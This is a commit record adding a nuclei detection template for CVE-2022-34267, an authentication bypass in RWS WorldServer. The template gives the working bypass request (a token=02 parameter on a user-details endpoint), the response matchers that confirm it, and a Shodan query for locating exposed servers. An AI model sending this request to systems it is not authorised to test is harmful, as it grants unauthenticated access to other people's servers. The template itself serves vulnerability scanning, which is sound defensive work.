Merge pull request #10347 from projectdiscovery/CVE-2022-34267

Create CVE-2022-34267.yaml
2024-07-25 17:00:13 +05:30 · 2024-07-25 17:00:13 +05:30 · 435d319e10
parent c129e43752 873b388a7a
commit 435d319e10
1 changed files with 49 additions and 0 deletions
--- a/http/cves/2022/CVE-2022-34267.yaml
+++ b/http/cves/2022/CVE-2022-34267.yaml
@ -0,0 +1,49 @@
+id: CVE-2022-34267
+
+info:
+  name: RWS WorldServer - Authentication Bypass
+  author: pdresearch,iamnoooob,rootxharsh,parthmalhotra
+  severity: critical
+  description: |
+    An issue was discovered in RWS WorldServer before 11.7.3. Adding a token parameter with the value of 02 bypasses all authentication requirements. Arbitrary Java code can be uploaded and executed via a .jar archive to the ws-api/v2/customizations/api endpoint.
+  reference:
+    - https://www.triskelelabs.com/vulnerabilities-in-rws-worldserver
+    - https://www.rws.com/localization/products/trados-enterprise/worldserver/
+    - https://github.com/tanjiti/sec_profile
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-34267
+    cwe-id: CWE-287
+    epss-score: 0.00106
+    epss-percentile: 0.43655
+    cpe: cpe:2.3:a:rws:worldserver:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: rws
+    product: worldserver
+    shodan-query: title:"WorldServer"
+  tags: cve,cve2022,worldserver,auth-bypass
+
+http:
+  - raw:
+      - |
+        GET /ws-api/v2/users/me/details?token=02 HTTP/2
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"fullName":"System"'
+
+      - type: word
+        part: content_type
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200